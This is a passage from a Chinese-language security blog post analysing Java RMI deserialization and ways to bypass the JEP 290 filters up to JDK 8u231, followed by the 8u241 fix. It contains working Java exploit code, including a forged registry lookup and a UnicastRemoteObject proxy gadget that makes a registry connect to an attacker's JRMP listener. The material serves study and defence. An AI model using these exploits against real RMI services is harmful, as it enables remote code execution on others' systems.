         &#125; else &#123;
             return ObjectInputFilter.Status.REJECTED;
         &#125;</code></pre>

<p>也就是白名单有</p>
<p>String / Number / Remote / Proxy / UnicastRef / RMIClientSocketFactory / RMIServerSocketFactory / ActivationID / UID</p>
<p>只要反序列化的类不是白名单中的类，就会返回 REJECTED 操作符，表示序列化流中有不合法的内容，直接抛出异常。</p>
<p>没有任何一条完整的反序列化攻击链能通过这个白名单，这样前面攻击注册中心的方法都失效了。<br><strong>但RegistryImpl_Stub里面的方法没有过滤，毕竟为了功能正常使用是没办法白名单的，所以注册中心攻击客户端依然可行。</strong></p>
<p><strong>3、配置了DGC过滤器</strong></p>
<p>DGC里的白名单校验更加严格</p>
<p>DGCImpl_Skel和DGCImpl_Stub里面的对象反序列化时会进行白名单校验，内容如下：</p>
<pre class="language-java" data-language="java"><code class="language-java">return (clazz &#x3D;&#x3D; ObjID.class ||
                 clazz &#x3D;&#x3D; UID.class ||
                 clazz &#x3D;&#x3D; VMID.class ||
                 clazz &#x3D;&#x3D; Lease.class)
                 ? ObjectInputFilter.Status.ALLOWED
                 : ObjectInputFilter.Status.REJECTED;</code></pre>

<p>这相当于直接断了攻击DGC的路</p>
<p>所以现在，我们还有的攻击路线是</p>
<p>客户端攻击服务端<br>服务端攻击客户端<br>注册中心攻击客户端<br>JRMP服务端攻击JRMP客户端</p>
<p>这四种都是不用变的，但是我们想绕过JEP 290的限制应该怎么做呢？</p>
<h1 id="RMI里的反序列化"><a href="#RMI里的反序列化" class="headerlink" title="RMI里的反序列化"></a>RMI里的反序列化</h1><p>既然JEP 290限制了我们反序列化的类，那我们就需要去找这里可以利用的类如何进行反序列化</p>
<h2 id="1-UnicastRemoteObject"><a href="#1-UnicastRemoteObject" class="headerlink" title="1. UnicastRemoteObject"></a>1. UnicastRemoteObject</h2><p><code>java.rmi.server.UnicastRemoteObject</code> 类通常是远程调用接口实现类的父类，或直接使用其静态方法 <code>exportObject</code> 来创建动态代理并随机监听本机端口以提供服务。</p>
<p>因此不难理解，在反序列化此类以及其子类后，依旧需要执行 <code>exportObject</code> 的相关操作，直接来看一下 UnicastRemoteObject 的 <code>readObject</code> 方法：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521161051772.png" alt="image-20230521161051772"></p>
<p>执行了reexport，又执行了 <code>exportObject</code> 方法。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521161121475.png" alt="image-20230521161121475"></p>
<p>所以UnicastRemoteObject这个类进行反序列化的时候，就相当于成为了一个JRMP的服务端，然后如果存在恶意的JRMP客户端，就有可能被攻击。</p>
<p><del>感觉这玩意怪鸡肋的，可能是我水平的问题，感觉和JRMPListener不是很像。JRMPListener是通过恶意JRMP服务端打客户端，但是这个是让自己监听自己的端口，相当于一个服务端，</del></p>
<p>想了一下，可能是通过UnicastRemoteObject的反序列化，然后让被攻击端发起一个网络请求，变成一个JRMP服务端，然后我们就可以通过恶意的客户端去进行攻击了。UnicastRemoteObject也是Remote的子类，所以能进行反序列化不受影响。但是仅凭这玩意没法绕过JEP 290，因为最主要的还是恶意客户端攻击的时候传的payload</p>
<h2 id="2-UnicastRef"><a href="#2-UnicastRef" class="headerlink" title="2. UnicastRef"></a>2. UnicastRef</h2><p><code>sun.rmi.server.UnicastRef</code> 类实现了 Externalizable 接口，因此在其反序列化时，会调用其 <code>readExternal</code> 方法执行额外的逻辑。</p>
<p>UnicastRef 的 <code>readExternal</code> 方法调用 <code>LiveRef.read(var1, false)</code> 方法来还原成员变量 <code>LiveRef ref</code> 属性。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521165213006.png" alt="image-20230521165213006"></p>
<p>LiveRef 的 <code>read</code> 方法在创建 LiveRef 对象后，调用 DGCClient 的 registerRefs 方法来将其在环境中进行注册。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521165339304.png" alt="image-20230521165339304"></p>
<p>调用 <code>DGCClient$EndpointEntry#registerRefs</code> 方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521165410161.png" alt="image-20230521165410161"></p>
<p>继续调用 <code>makeDirtyCall</code> 方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521165532081.png" alt="image-20230521165532081"></p>
<p>然后就会调用dgc的dirty方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521165621111.png" alt="image-20230521165621111"></p>
<p>因此可以看出，在 UnicastRef 进行反序列化时，会触发 DGC 通信及 dirty 方法调用，此时如果与一个恶意服务通信，返回恶意数据流，则会造成反序列化漏洞。</p>
<p>poc</p>
<pre class="language-java" data-language="java"><code class="language-java">public static void main(String[] args) throws Exception &#123;

    String host &#x3D; &quot;127.0.0.1&quot;;
    int    port &#x3D; 12233;

    ObjID id  &#x3D; new ObjID(new Random().nextInt()); &#x2F;&#x2F; RMI registry
    TCPEndpoint te  &#x3D; new TCPEndpoint(host, port);
    UnicastRef ref &#x3D; new UnicastRef(new LiveRef(id, te, false));

    ser(ref);
    unser();
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521170202429.png" alt="image-20230521170202429"></p>
<h2 id="3-RemoteObject"><a href="#3-RemoteObject" class="headerlink" title="3. RemoteObject"></a>3. RemoteObject</h2><p>RemoteObject 是几乎所有 RMI 远程调用类的父类。这个类也可以用来触发反序列化漏洞。</p>
<p>RemoteObject 的 readObject 方法会先反序列化成员变量 <code>RemoteRef ref</code> ，最后调用其 readExternal 方法，可以用来触发上一条 UnicastRef 链。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/1633660408218.png" alt="1633660408218"></p>
<p>因此我们随便找一个 RemoteObject 的子类，在其实例中放入 UnicastRef 对象，反序列化时均可触发利用链。例如如下利用代码，</p>
<pre class="language-java" data-language="java"><code class="language-java">public static void main(String[] args) throws Exception &#123;

    String host &#x3D; &quot;127.0.0.1&quot;;
    int    port &#x3D; 12233;

    ObjID id  &#x3D; new ObjID(new Random().nextInt()); &#x2F;&#x2F; RMI registry
    TCPEndpoint te  &#x3D; new TCPEndpoint(host, port);
    UnicastRef ref &#x3D; new UnicastRef(new LiveRef(id, te, false));
    RMIServerImpl_Stub stub &#x3D; new RMIServerImpl_Stub(ref);

    ser(stub);
    unser();
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521170839576.png" alt="image-20230521170839576"></p>
<h1 id="绕过JEP-290"><a href="#绕过JEP-290" class="headerlink" title="绕过JEP 290"></a>绕过JEP 290</h1><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20211201211404548.png" alt="image-20211201211404548"></p>
<p>根据我们前面说的，我们可以得到这样一个绕过JEP 290的方法</p>
<p>首先借助RMI原生的、且在白名单里的类，将其作为客户端的参数，然后在注册中心进行反序列化读取的时候，触发JRMP请求，我们可以规定向我们的恶意JRMP服务端进行请求，这样就可以实现对JEP 290的绕过</p>
<p>服务端代码不变</p>
<p>客户端为</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIClient &#123;
    public static void main(String[] args) throws Exception &#123;
        Registry registry &#x3D; LocateRegistry.getRegistry(&quot;127.0.0.1&quot;, 1098);
        &#x2F;&#x2F;unicastref构造反序列化
        String host &#x3D; &quot;127.0.0.1&quot;;
        int    port &#x3D; 12233;
        ObjID id  &#x3D; new ObjID(new Random().nextInt()); &#x2F;&#x2F; RMI registry
        TCPEndpoint te  &#x3D; new TCPEndpoint(host, port);
        UnicastRef ref1 &#x3D; new UnicastRef(new LiveRef(id, te, false));
        RMIServerImpl_Stub stub &#x3D; new RMIServerImpl_Stub(ref1);

        &#x2F;&#x2F;获取ref
        Class&lt;?&gt; RO &#x3D; Class.forName(&quot;java.rmi.server.RemoteObject&quot;);
        Field declaredField &#x3D; RO.getDeclaredField(&quot;ref&quot;);
        declaredField.setAccessible(true);
        RemoteRef ref0 &#x3D; (RemoteRef)declaredField.get(registry);
        &#x2F;&#x2F;获取 operations
        Class&lt;?&gt; RegistryImpl_Stub &#x3D; Class.forName(&quot;sun.rmi.registry.RegistryImpl_Stub&quot;);
        Field operations_field &#x3D; RegistryImpl_Stub.getDeclaredField(&quot;operations&quot;);
        operations_field.setAccessible(true);
        Operation[] operations &#x3D; (Operation[])operations_field.get(registry);

&#x2F;&#x2F;伪造lookup
        RemoteCall var2 &#x3D; ref0.newCall((RemoteObject) registry, operations, 2, 4905912898345647071L);
        ObjectOutput var3 &#x3D; var2.getOutputStream();
        var3.writeObject(stub);
        ref0.invoke(var2);
    &#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521181302761.png" alt="image-20230521181302761"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521181134141.png" alt="image-20230521181134141"></p>
<h1 id="JDK8u231"><a href="#JDK8u231" class="headerlink" title="JDK8u231"></a>JDK8u231</h1><p>没环境了，照抄了（</p>
<h2 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h2><p>而在jdk8u231中，RMI又增加了新的安全措施。<br>首先是对注册中心进行了加固，更新后的RegistryImpl_Skel#dispatch</p>
<pre class="language-java" data-language="java"><code class="language-java">case 2: &#x2F;&#x2F; lookup(String)
&#123;
    java.lang.String $param_String_1;
    try &#123;
        java.io.ObjectInput in &#x3D; call.getInputStream();
        $param_String_1 &#x3D; (java.lang.String) in.readObject();
    &#125; catch (ClassCastException | IOException | ClassNotFoundException e) &#123;
        call.discardPendingRefs();
        throw new java.rmi.UnmarshalException(&quot;error unmarshalling arguments&quot;, e);
    &#125; finally &#123;
        call.releaseInputStream();
    &#125;
    java.rmi.Remote $result &#x3D; server.lookup($param_String_1);
    try &#123;
        java.io.ObjectOutput out &#x3D; call.getResultStream(true);
        out.writeObject($result);
    &#125; catch (java.io.IOException e) &#123;
        throw new java.rmi.MarshalException(&quot;error marshalling return&quot;, e);
    &#125;
    break;
&#125;
......</code></pre>

<p>可以和8u231之前的比较一下</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521182330772.png" alt="image-20230521182330772"></p>
<p>其实就多了一行<code> call.discardPendingRefs();</code>,但是这个方法会在反序列化出错之后把incomingRefTable清空。那么在ConnectionInputStream#registerRefs就进不去ConnectionInputStream#registerRefs了。而且由于我们是自己重写的lookup，传的是个Object类型而不是String，所以在强转的时候一定会进catch里的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521182655046.png" alt="image-20230521182655046"></p>
<p>还有一处修复在DGCImpl_Stub</p>
<pre class="language-java" data-language="java"><code class="language-java">public void clean(java.rmi.server.ObjID[] $param_arrayOf_ObjID_1, long $param_long_2, java.rmi.dgc.VMID $param_VMID_3, boolean $param_boolean_4)
            throws java.rmi.RemoteException &#123;
        try &#123;
            StreamRemoteCall call &#x3D; (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject) this,
                    operations, 0, interfaceHash);
            call.setObjectInputFilter(DGCImpl_Stub::leaseFilter);
            try &#123;
                java.io.ObjectOutput out &#x3D; call.getOutputStream();
                out.writeObject($param_arrayOf_ObjID_1);
                out.writeLong($param_long_2);
                out.writeObject($param_VMID_3);
                out.writeBoolean($param_boolean_4);
            &#125; catch (java.io.IOException e) &#123;
                throw new java.rmi.MarshalException(&quot;error marshalling arguments&quot;, e);
            &#125;
            ref.invoke(call);
            ref.done(call);
        &#125; catch (java.lang.RuntimeException e) &#123;
            throw e;
        &#125; catch (java.rmi.RemoteException e) &#123;
            throw e;
        &#125; catch (java.lang.Exception e) &#123;
            throw new java.rmi.UnexpectedException(&quot;undeclared checked exception&quot;, e);
        &#125;
    &#125;

    &#x2F;&#x2F; implementation of dirty(ObjID[], long, Lease)
    public java.rmi.dgc.Lease dirty(java.rmi.server.ObjID[] $param_arrayOf_ObjID_1, long $param_long_2, java.rmi.dgc.Lease $param_Lease_3)
            throws java.rmi.RemoteException &#123;
        try &#123;
            StreamRemoteCall call &#x3D;
                    (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject) this,
                            operations, 1, interfaceHash);
            call.setObjectInputFilter(DGCImpl_Stub::leaseFilter);
            try &#123;
                java.io.ObjectOutput out &#x3D; call.getOutputStream();
                out.writeObject($param_arrayOf_ObjID_1);
                out.writeLong($param_long_2);
                out.writeObject($param_Lease_3);
            &#125; catch (java.io.IOException e) &#123;
                throw new java.rmi.MarshalException(&quot;error marshalling arguments&quot;, e);
            &#125;
            ref.invoke(call);
            java.rmi.dgc.Lease $result;
            Connection connection &#x3D; call.getConnection();
            try &#123;
                java.io.ObjectInput in &#x3D; call.getInputStream();

                $result &#x3D; (java.rmi.dgc.Lease) in.readObject();
            &#125; catch (ClassCastException | IOException | ClassNotFoundException e) &#123;
                if (connection instanceof TCPConnection) &#123;
                    &#x2F;&#x2F; Modified to prevent re-use of the connection after an exception
                    ((TCPConnection) connection).getChannel().free(connection, false);
                &#125;
                call.discardPendingRefs();
                throw new java.rmi.UnmarshalException(&quot;error unmarshalling return&quot;, e);
            &#125; finally &#123;
                ref.done(call);
            &#125;
            return $result;
        &#125; catch (java.lang.RuntimeException e) &#123;
            throw e;
        &#125; catch (java.rmi.RemoteException e) &#123;
            throw e;
        &#125; catch (java.lang.Exception e) &#123;
            throw new java.rmi.UnexpectedException(&quot;undeclared checked exception&quot;, e);
        &#125;
    &#125;</code></pre>

<p>和之前的比一下</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521182935214.png" alt="image-20230521182935214"></p>
<p>可以看到它把setObjectInputFilter方法提前了，在旧版本中，我们攻击JRMP客户端的时候直接调用了ref.invoke(call);去触发反序列化，对于后面的过滤器可以不用考虑，但是现在过滤器在我们的反序列化之前了。</p>
<p>这对于之前的JRMP攻击方式来说都是致命的</p>
<h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h2><p>从前面的分析可以知道，如果想在不知道远程接口的情况想攻击注册中心/服务端，目前能控制的最大范围就是注册中心和DGC的filter里面限制的几个类。</p>
<p>这里绕过思路很容易想到，思路大致是：在<code>RegistryImpl_Skel#dispatch</code>反序列化时(还没反序列化完，绕过报错)，在这里就发出JRMP请求，不需要后面的releaseInputStream，同时也不需要在DGC客户端的ConnectionInputStream中完成readObject，而是另起一道来执行(绕过DGC层过滤)。</p>
<p>但是真正去找这么一条利用链是很困难的。我们要先看一下白名单有哪些可以用：<br>1、RegistryImpl_Skel，允许Remote/UnicastRef/RMIClientSocketFactory/RMIServerSocketFactory/ActivationID/UID<br>2、DGCImpl_Skel，允许ObjID/UID/VMID/Lease<br>看看这些类哪些是可以序列化并且重写了readObject/readExternal之类改变调用流程的，找了下有这些：<br>UnicastRef<br>UnicastRef2<br>UnicastServerRef<br>ActivationID<br>RemoteObject<br>UnicastRemoteObject</p>
<p>这里我直接说了，在JDK8u231的情况下，采用的是UnicastRemoteObject实现的反序列化绕过</p>
<p>这是一条由国外的An Trinh师傅提出来的攻击方法，原文在[这篇文章][An Trinhs RMI Registry Bypass | MOGWAI LABS<a target="_blank" rel="noopener" href="https://mogwailabs.de/en/blog/2020/02/an-trinhs-rmi-registry-bypass/)]%E9%87%8C">https://mogwailabs.de/en/blog/2020/02/an-trinhs-rmi-registry-bypass/)]里</a></p>
<p>这个payload会在<strong>readobject函数调用过程</strong>直接触发JRMP请求</p>
<p>在8u231之前，我们的反序列化攻击的流程是</p>
<ol>
<li><strong>readobject反序列化的过程会递归反序列化我们的对象，一直反序列化到我们的UnicastRef类。</strong></li>
<li><strong>在readobejct反序列化的过程中填装UnicastRef类到<code>incomingRefTable</code></strong></li>
<li><strong>在releaseInputStream语句中从incomingRefTable中读取ref进行开始JRMP请求</strong></li>
</ol>
<p>而An Trinh这条利用链的攻击流程是</p>
<ol>
<li><strong>readobject递归反序列化到payload对象中的UnicastRef对象，填装UnicastRef对象的ref到<code>incomingRefTable</code></strong></li>
<li><strong>在根据readobject的第二个最著名的特性：会调用对象自实现的readobject方法，会执行UnicastRemoteObject的readObject，An Trinh的Gadgets会在这里触发一次JRMP请求</strong></li>
<li><strong>在releaseInputStream语句中从<code>incomingRefTable</code>中读取ref进行开始JRMP请求</strong></li>
</ol>
<p>这个利用链的开始点是UnicastRemoteObject的readObject方法。和我们之前说的在RMI里的反序列化那章的UnicastRemoteObject不同，这里在调用reexport后，对ssf进行了填充</p>
<p>因此会进入else里的exportObject</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521204325976.png" alt="image-20230521204325976"></p>
<p>然后遇见exportObject就往里跟，最后会发现调用了TCPTransport的exportObject方法，其中又调用了listen方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521204524317.png" alt="image-20230521204524317"></p>
<p>listen里调用了TCPEndpoint类的newServerSocket方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521204702729.png" alt="image-20230521204702729"></p>
<p>在这里，他调用了我们ssf的createServerSocket方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521204831307.png" alt="image-20230521204831307"></p>
<p>那假如我们这里的ssf是个代理类，就可以先进入代理类的invoke方法了</p>
<p>要知道，我们绕这么一大圈，最后还是要走UnicastRef#invoke-&gt;StreamRemoteCall#executeCall-&gt;注册中心/服务端攻击客户端这条路</p>
<p>这里的这个代理类就是RemoteObjectInvocationHandler</p>
<p>为什么选这个类呢，因为重载了我们之前用的UnicastRef的invoke方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521210125014.png" alt="image-20230521210125014"></p>
<p>在重载后的这个invoke里，同样调用了executeCall</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521205832911.png" alt="image-20230521205832911"></p>
<p>从分析里就能看出来，这个只需要把ssf设置成一个代理RMIServerSocketFactory接口的动态代理，里面放RemoteObjectInvocationHandler，调用这里时最终就触发了executeCall</p>
<p>不过在在之后还有一个问题</p>
<p>就是在RegistryImpl_Stub的方法里调用了writeObject，而writeObject里有个判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521230608649.png" alt="image-20230521230608649"></p>
<p>如果enableReplace为true。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/t010c68f5a4abd1ff40.png" alt="img"></p>
<p>检测我们要序列化的obj，是否实现Remote/RemoteStub，由于UnicastRemoteObject实现了Remote，没有实现RemoteStub，于是会进入判断，就会替换我们的obj，以至于反序列化的时候不能还原我们构造的类。</p>
<p>所以，需要把enableReplace改为false。</p>
<p>（这是<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/211722#h3-5%E8%BF%99%E7%AF%87%E6%96%87%E7%AB%A0%E7%9A%84%E4%BB%A3%E7%A0%81%E5%9B%BE%EF%BC%8C%E4%BD%86%E6%98%AF%E6%88%91%E6%9C%AC%E5%9C%B0%E7%9A%848u231%E7%89%88%E6%9C%AC%E9%87%8C%E7%9A%84writeObject%E5%B9%B6%E4%B8%8D%E9%95%BF%E8%BF%99%E6%A0%B7%EF%BC%8C%E8%80%8C%E4%B8%94%E8%B0%83%E8%AF%95%E7%9A%84%E6%97%B6%E5%80%99enableReplace%E6%9C%AC%E6%9D%A5%E5%B0%B1%E6%98%AFfalse%EF%BC%8C%E5%BE%88%E6%80%AA%EF%BC%8C%E4%BD%86%E6%98%AF%E7%94%B1%E4%BA%8E%E6%B2%A1%E6%9C%89%E6%89%BE%E5%88%B0%E5%8E%9F%E5%9B%A0%EF%BC%8C%E6%89%80%E4%BB%A5%E6%88%91%E9%80%89%E6%8B%A9%E7%9B%B8%E4%BF%A1%E8%BF%99%E7%AF%87%E6%96%87%E7%AB%A0%EF%BC%8C%E5%8F%AF%E8%83%BD%E6%98%AF%E5%9B%A0%E4%B8%BA%E6%88%91%E6%B2%A1%E6%9C%89231%E7%9A%84%E6%BA%90%E7%A0%81%E6%89%80%E4%BB%A5%E8%B0%83%E8%AF%95%E7%9A%84%E6%97%B6%E5%80%99%E5%87%BA%E4%BA%86%E7%82%B9%E9%97%AE%E9%A2%98">https://www.anquanke.com/post/id/211722#h3-5这篇文章的代码图，但是我本地的8u231版本里的writeObject并不长这样，而且调试的时候enableReplace本来就是false，很怪，但是由于没有找到原因，所以我选择相信这篇文章，可能是因为我没有231的源码所以调试的时候出了点问题</a></p>
<p>抄一个exp，这个原本是重写了bind方法的，我试着重写了lookup方法，也能触发</p>
<pre class="language-java" data-language="java"><code class="language-java">public class BypassJEP290ByUnicastRemoteObject &#123;
    public static void main(String[] args) throws Exception &#123;
        UnicastRemoteObject payload &#x3D; getPayload();
        Registry registry &#x3D; LocateRegistry.getRegistry(1098);
&#x2F;&#x2F;        bindReflection(&quot;pwn&quot;, payload, registry);
        lookupReflection(payload, registry);
    &#125;

    static UnicastRemoteObject getPayload() throws Exception &#123;
        ObjID id &#x3D; new ObjID(new Random().nextInt());
        TCPEndpoint te &#x3D; new TCPEndpoint(&quot;localhost&quot;, 12233);
        UnicastRef ref &#x3D; new UnicastRef(new LiveRef(id, te, false));

        System.getProperties().put(&quot;sun.misc.ProxyGenerator.saveGeneratedFiles&quot;, &quot;true&quot;);
        RemoteObjectInvocationHandler handler &#x3D; new RemoteObjectInvocationHandler(ref);
        RMIServerSocketFactory factory &#x3D; (RMIServerSocketFactory) Proxy.newProxyInstance(
                handler.getClass().getClassLoader(),
                new Class[]&#123;RMIServerSocketFactory.class, Remote.class&#125;,
                handler
        );

        Constructor&lt;UnicastRemoteObject&gt; constructor &#x3D; UnicastRemoteObject.class.getDeclaredConstructor();
        constructor.setAccessible(true);
        UnicastRemoteObject unicastRemoteObject &#x3D; constructor.newInstance();

        Field field_ssf &#x3D; UnicastRemoteObject.class.getDeclaredField(&quot;ssf&quot;);
        field_ssf.setAccessible(true);
        field_ssf.set(unicastRemoteObject, factory);

        return unicastRemoteObject;
    &#125;

    static void bindReflection(String name, Object obj, Registry registry) throws Exception &#123;
        Field ref_filed &#x3D; RemoteObject.class.getDeclaredField(&quot;ref&quot;);
        ref_filed.setAccessible(true);
        UnicastRef ref &#x3D; (UnicastRef) ref_filed.get(registry);

        Field operations_filed &#x3D; RegistryImpl_Stub.class.getDeclaredField(&quot;operations&quot;);
        operations_filed.setAccessible(true);
        Operation[] operations &#x3D; (Operation[]) operations_filed.get(registry);

        RemoteCall remoteCall &#x3D; ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L);
        ObjectOutput outputStream &#x3D; remoteCall.getOutputStream();

        Field enableReplace_filed &#x3D; ObjectOutputStream.class.getDeclaredField(&quot;enableReplace&quot;);
        enableReplace_filed.setAccessible(true);
        enableReplace_filed.setBoolean(outputStream, false);

        outputStream.writeObject(name);
        outputStream.writeObject(obj);

        ref.invoke(remoteCall);
        ref.done(remoteCall);
    &#125;
    static void lookupReflection(Object obj, Registry registry) throws Exception &#123;
        Class&lt;?&gt; RO &#x3D; Class.forName(&quot;java.rmi.server.RemoteObject&quot;);
        Field declaredField &#x3D; RO.getDeclaredField(&quot;ref&quot;);
        declaredField.setAccessible(true);
        RemoteRef ref0 &#x3D; (RemoteRef) declaredField.get(registry);
        &#x2F;&#x2F;获取 operations
        Class&lt;?&gt; RegistryImpl_Stub &#x3D; Class.forName(&quot;sun.rmi.registry.RegistryImpl_Stub&quot;);
        Field operations_field &#x3D; RegistryImpl_Stub.getDeclaredField(&quot;operations&quot;);
        operations_field.setAccessible(true);
        Operation[] operations &#x3D; (Operation[]) operations_field.get(registry);
&#x2F;&#x2F;伪造lookup
        RemoteCall var2 &#x3D; ref0.newCall((RemoteObject) registry, operations, 2, 4905912898345647071L);
        ObjectOutput var3 &#x3D; var2.getOutputStream();
        Field enableReplace_filed &#x3D; ObjectOutputStream.class.getDeclaredField(&quot;enableReplace&quot;);
        enableReplace_filed.setAccessible(true);
        enableReplace_filed.setBoolean(var3, false);
        var3.writeObject(obj);
        ref0.invoke(var2);
    &#125;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521232049898.png" alt="image-20230521232049898"></p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><p>另外还有一点关于JEP 290绕过方式的补充</p>
<p>在JDK8u231之前，用那个payload打注册中心，会有一个现象，就是当客户端发送完请求之后，服务端会在经过一段时间后就弹一个计算器出来。</p>
<p>这是由于DGCClient#registerRefs，可以看到这是个循环，如果epEntry.registerRefs返回的是false，就会一直卡在这个循环里</p>
<p>其实<strong>这里是一个DGC客户端不断向DGC服务端汇报远程对象ref的存活状况，当ref不存在时，该方法的返回值就会是true了，然后就会跳出循环。这样就会造成一个有趣的现象：DGC客户端以一定的时间间隔向DGC服务端(恶意的JRMP服务端)发起请求，类似TCP连接的心跳包，又类似一个不死马，受攻击的DGC客户端(这里是Registry端)会以同频的时间间隔不断弹出计算器。</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230521232639466.png" alt="image-20230521232639466"></p>
<p>调用栈</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">readObject:431, ObjectInputStream (java.io)
executeCall:252, StreamRemoteCall (sun.rmi.transport)
invoke:161, UnicastRef (sun.rmi.server)
invokeRemoteMethod:227, RemoteObjectInvocationHandler (java.rmi.server)
invoke:179, RemoteObjectInvocationHandler (java.rmi.server)
createServerSocket:-1, $Proxy0 (com.sun.proxy)
newServerSocket:666, TCPEndpoint (sun.rmi.transport.tcp)
listen:335, TCPTransport (sun.rmi.transport.tcp)
exportObject:254, TCPTransport (sun.rmi.transport.tcp)
...
exportObject:346, UnicastRemoteObject (java.rmi.server)
reexport:268, UnicastRemoteObject (java.rmi.server)
readObject:235, UnicastRemoteObject (java.rmi.server)</code></pre>

<h1 id="JDK8u241修复"><a href="#JDK8u241修复" class="headerlink" title="JDK8u241修复"></a>JDK8u241修复</h1><p>在调用UnicastRef.invoke之前声明方法的类，必须要实现Remote接口，然而这里的RMIServerSocketFactory并没有实现，于是无法进入到invoke方法，直接抛出错误。</p>
<p>抬走了，等一手0day</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>虽然写完了，但实际上还有许多细节的部分有点不懂，RMI的东西实在是有点多而且繁琐，这三篇也只能算个基础，还要去学JNDI注入之类的。而且还有一些关于RMI攻击的工具没有用过，比如RMIScout、BaRMIe、ysomap等，还是以后用到了再补吧。<del>比如对于绕过JEP290的方式中，触发反序列化具体的路径是哪里之类的，因为有点懒所以并没有仔细的跟过</del>（补上了，还有就是感谢互联网的共享精神（，感觉这三篇rmi里，有一篇半都是照抄别人的内容。</p>
<p>最后偷张图</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/20200702100127-f0d4c18c-bc07-1.png" alt="20200702100127-f0d4c18c-bc07-1"></p>
<h1 id="补充-1"><a href="#补充-1" class="headerlink" title="补充"></a>补充</h1><p>补一下触发反序列化的地方</p>
<p>绕过JDK8u231的payload反序列化触发点是</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230522093912129.png" alt="image-20230522093912129"></p>
<p>从RegistryImpl_Skel里的这个readObject直接跳到UnicastRemoteObject</p>
<p>然后会走我们在前边写的从UnicastRemoteObject到UnicastRef.Invoke的路线，在invoke里的这行会触发一个jrmp请求，</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230522102823178.png" alt="image-20230522102823178"></p>
<p>然后就会把从恶意服务端请求回来的结果传进StreamRemoteCall#executeCall，实现攻击的目的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230522102939678.png" alt="image-20230522102939678"></p>
<p>而在在JDK8U231之前绕过JEP290的触发点同样也是从RegistryImpl_Skel开始的</p>
<p>首先是从in.readObject，在这里面会让incomingRefTable的值不为空，然后进入call.releaseInputStream里，去触发我们之前写的UnicastRef的反序列化路线</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230522104237433.png" alt="image-20230522104237433"></p>
<p>最终在DGCImpl_Stub#dirty里发起了一个jrmp请求</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230522104407951.png" alt="image-20230522104407951"></p>
<p>然后同样是把从恶意服务端返回来的东西调到传进UnicastRef#Invoke，然后再进入StreamRemoteCall#executeCall，实现攻击的目的</p>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a target="_blank" rel="noopener" href="https://paper.seebug.org/1689/">https://paper.seebug.org/1689/</a> （前两部分基本上都抄的这个</p>
